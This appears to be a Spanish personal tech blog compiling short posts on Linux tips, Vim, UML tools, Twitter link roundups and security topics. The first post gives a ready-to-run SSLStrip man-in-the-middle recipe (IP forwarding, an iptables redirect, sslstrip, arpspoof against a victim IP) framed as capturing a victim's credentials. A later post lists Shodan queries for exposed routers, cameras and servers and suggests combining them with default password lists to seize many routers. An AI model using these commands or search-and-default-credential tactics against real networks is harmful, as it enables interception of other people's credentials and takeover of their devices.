SSLStrip fácil sencillo y ...

Buenass

si eres como yo, que habías retrasado la prueba de SSLStrip deja lo que estés haciendo y mira este video de Securitytube sobre SSLStrip o simplemente:

1. Descarga SSLstrip http://www.thoughtcrime.org/software/sslstrip/
2.  #>  echo "1" > /proc/sys/net/ipv4/ip_forward
3.  #>  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4.  $> python sslstrip.py -w captura_datos_sniff
5.  #> arpspoof -i eth0 -t IP_Victima IP_router

Y tendrás a tu victima navegando sin SSL y además capturarás sus credenciales.

David

Simple Malware Analyzing

Buenass,

mediante el twitter de securitytube he visto un video donde enseñan de forma sencilla a analizar malware mediante el analisis del flujo de red y de la monitorización de los archivos creados:

Simple Malware Analyzing

David

Diagramas UML multiplataforma

Buenas,

necesito hacer ciertos diagramas UML como de casos de uso, de secuencia, de clases... Buscando por Interné he encontrado Violet UML Editor, que está desarrollado en Java por eso permite utilizarse en cualquier plataforma con máquina virtual Java.

Una característica que me gusta es que puedes copiar al portapapeles el diagrama que estes diseñando, para luego importarlo a Krita o Gimp.

Lo que no me gusta y sería fácil de implementar es que no puedes editar las flechas, es decir, no puedes ajustar los 'brazos' de las flechas para que no se crucen con las cajas.

David

Dual head, dos monitores sin clonar - actualizado

Buenas

haya por octubre de 2009 cuando puse dos monitores escribí el post sobre como poner en Ubuntu dos monitores en dual head. Sin embargo, no incluí en el comando la opción del refresco que es bastante importante porque no es lo mismo que te tome el refresco que quiera, en mi caso 60Hz ha estar con un refresco de 85Hz.

Para cambiarlo solo hay que añadir el modificador --rate, y la órden queda así:

$ xrandr --output VGA-0 --mode 1024x768 --right-of LVDS --rate 85Hz

He tomado el valor del refresco con el comando sin modificadores:
$ xrandr

Screen 0: minimum 320 x 200, current 2304 x 800, maximum 2304 x 800
VGA-0 connected 1024x768+1280+0 (normal left inverted right x axis y axis) 306mm x 230mm
   1024x768       85.0     75.0     70.1     60.0*
   832x624        74.6
   800x600       100.0     85.1     72.2     75.0     60.3
   640x480       100.0     85.0     75.0     72.8     59.9
   720x400        70.1
   640x350        70.1
LVDS connected 1280x800+0+0 (normal left inverted right x axis y axis) 331mm x 207mm
   1280x800       60.0*+   50.0
   1280x720       59.9
   1152x768       59.8
   1024x768       59.9
   800x600        59.9
   640x480        59.4



David

Vim: convierte mayusculas / minusculas de forma sencilla

Buenass,

necesitaba convertir de mayusculas a minusculas constantemente ciertas palabras por lo que intuía que vim tenía que tener una opción que lo automatizase y así es. En el blog de Flasheina hay un post muy breve donde explican cómo conseguirlo, éstos son los pasos sacados del post:

Convertir palabra a mayusculas:

gUw  <-- intuyo que U vendrá de Uppercase y w  de Word

Convertir palabra a minusculas:

guw

Si en vez de convertir una palabra, necesitamos convertir toda la línea se sustitye la 'w' por '$'.

Además, he creado una macro que introducía una cadena al inicio de la frase.

Gracias Flasheina,

David

Nuevo video: Inteco-CERT

Buenas

Nuevo video de Inteco-Cert sobre la aparición de un troyano:




Están muy mal ...

David

Recopilación enlaces Twitter 01

Buenas,

no llevo ni dos días con Twitter y la verdad es que me está gustando bastante. Puedes 'estar en contacto' con aquellos 'cracks' que sigues en sus blogs pero de una forma más directa donde se suele encontrar los links, papers ... que están leyendo e info interesante, que para eso les sigues!!

Os animo a que os hagáis una cuenta y si queréis unios a la mía. Tengo una imagen en la web con mi cuenta.

He decidido hacer una recopilación en el blog con los enlaces más interestantes que postean/posteo, el ritmo es frenético por lo que habrá bastantes post sobre recopilación de enlaces de Twitter. Así que empezamos recopilación:

• http://www.m86security.com/trace/i/Lethic,spambot.1205~.asp <-- analisis de botnet Lethic
• http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html
• http://sunbeltblog.blogspot.com/2010/01/month-of-russian-bugs.html
• http://intevydis.blogspot.com/2010/01/jan-10-2010-regarding-responsible.html

David

TodoLinux Nº 110

Buenass

ya tengo en mi casa el nº 110 de la revista TodoLinux. Este mes colaboro con un artículo sobre Comunicaciones seguras en redes Wifi Públicas. Se explica cómo podemos cifrar nuestras comunicaciones para que los fisgones no se enteren de lo que estamos haciendo.

Todavía no he podido leerme la revista completa, pero tiene buena pinta:

• Alternativa a Apache [leído - buena introducción sobre varios servidores web ligeros]
• Llamadas de teléfono con Ekiga
• Debian GNU/kFreeBSD
• Configurando NFS como sistema de archivos
• Autoedición de revistas con Scribus [mola]
• Comunicaciones seguras en redes Wifi Públicas [cool ... xD]
• El entorno de programación de videojuegos BennuGD
• Instalación de Lector de DNI electrónico
• Haiku
• Alternativas a MySQL

David

Otro más en Twitter

Buenas

me he lanzado a abrirme un twitter que servirá como reemplazo a los últimos post donde solo recomendaba enlaces que me gustaban. Tengo pensado hacer 1 vez al mes una recopilación de los enlaces puestos en twitter y  postearlos en el blog.

Como veis he añadido un widget con el enlace a mi usuario de Twitter.

David

Activar Network Manager en Ubuntu

Buenas,

normalmente tengo configurada la red sin utilizar Network-Manager pero ahora necesito una conexión VPN con mi Universidad y Network-Manager facilita la conexión.

Para permitir a Network-Manager gestionar los dispositivos de red se edita el fichero etc/NetworkManager/nm-system-settings.conf:

#> vim /etc/NetworkManager/nm-system-settings.conf
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=true


David

Traversecode, blog sobre analisis de malware

Mediante el patrocinio (vease spam) de un blog de uno de los miembros del grupo de
Malware/Spyware/Security-Researchers/Analystsen Linkedin he encontrado un nuevo blog que tiene buena pinta. Lleva 4 post relacionados con el analisis de malware donde detalla de forma técnica varios especimenes de malware que encuentra.

• Decrypting the Zeus Config File
• Trojan.MalScript!html
• Get – ‘Site’ – Go

No tienen desperdicio

Shodan: listado de búsquedas

En esta entrada voy a dejar un listado de todas las entradas para shodan que vaya encontrando. En el primer post que hablé sobre shodan, ya puse un listado.

• camera country:ES <-- Visto en Comentarios de SBD
• http://shodan.surtri.com/?q=port%3A23++Password+is+not+set+ <-- Devuelve resultados de Impresoras HP. Visto en twitter de aramosf
• iis 4.0
• http://shodan.surtri.com/?q=+country:CL+port:80 <-- sacado de http://securityetalii.wordpress.com/2010/01/26/como-montarte-una-botnet-de-routers-for-dummies/
  http://shodan.surtri.com/?q=country:CL+port:80+country:MX&page=5 (estos dos, en combinación de un listado de passwords por defecto y tienes muuuchoss routers a tu disposicion.)

secanalysis.com tienen un listado organizado por categorías que copio aquí:

WebServer Detection

1. IIS+2.0

2. IIS+3.0

3. IIS+4.0

4. IIS+5.0

5. IIS+6.0

6. Websphere+4.0

7. Websphere+5.0

8. Websphere+6.0

9. “Oracle HTTP Server”

10. Jrun

11. RaidenHTTPd

12. “IBM HTTP”

13. Tru64

14. iCern

15. Lotus-Domino + 1.0

16. Apache (tons of versions with this, too many to list)

17. Windweb


CMS Detection

1. Joomla

2. Drupal

3. Wordpress

4. Typo3


Network Device Detection

1. Linksys

1. Linksys+wrt54g

2. Linksys+wap54g

3. Linksys+BEFDSR41w

4. Linksys+BEFSX41

5. Linksys+wap200

6. Linksys+CIT400 (This is a telephony kit...interesting)

7. Linksys+RVS4000

8. Linksys+WET54G

9. Linksys+WAG54GX2

10. Linksys+WAG54GS

2. Netgear

1. Netgear+DG834

2. Netgear+PS121v2

3. Netgear+WGR614v9

4. Netgear+WAG302v2

5. Netgear+DG834PN

3. Cisco

3. Cisco+RVo82

4. Cisco+CSS

5. Cisco+PIX

6. Cisco+VPN

7. Cisco+Server

4. Fuji+Xerox

5. JetDirect
Other

1. Xerver

2. port:23+ list+of+built-in+commands

3. port:80+iisstart.html

4. Server: SQ-WEBCAM

5. “Anonymous+access+allowed”

6. Golden+FTP+Server

7. “Server:+iWeb”+HTTP

8. passwd

9. passwd+user+vname

10. deleted

Pd: si teneis vuestros propios listados ponedlos por aquí